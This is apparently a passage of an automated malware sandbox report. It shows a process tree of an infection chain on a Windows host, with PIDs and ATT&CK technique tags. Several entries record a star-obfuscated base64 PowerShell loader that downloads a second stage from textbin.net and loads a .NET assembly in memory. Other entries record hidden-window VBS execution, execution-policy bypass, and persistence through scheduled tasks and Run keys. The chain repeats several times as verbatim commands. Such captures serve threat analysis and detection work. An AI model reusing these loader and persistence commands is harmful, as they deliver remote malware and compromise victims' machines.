★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        
        PID:2580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:4136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:4948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1196
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:4564
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:4512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:3996
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:3232
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1588
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5340
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:4560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:1724
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:5960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:2004
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:6060
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1736
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        
        PID:1204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2068
        
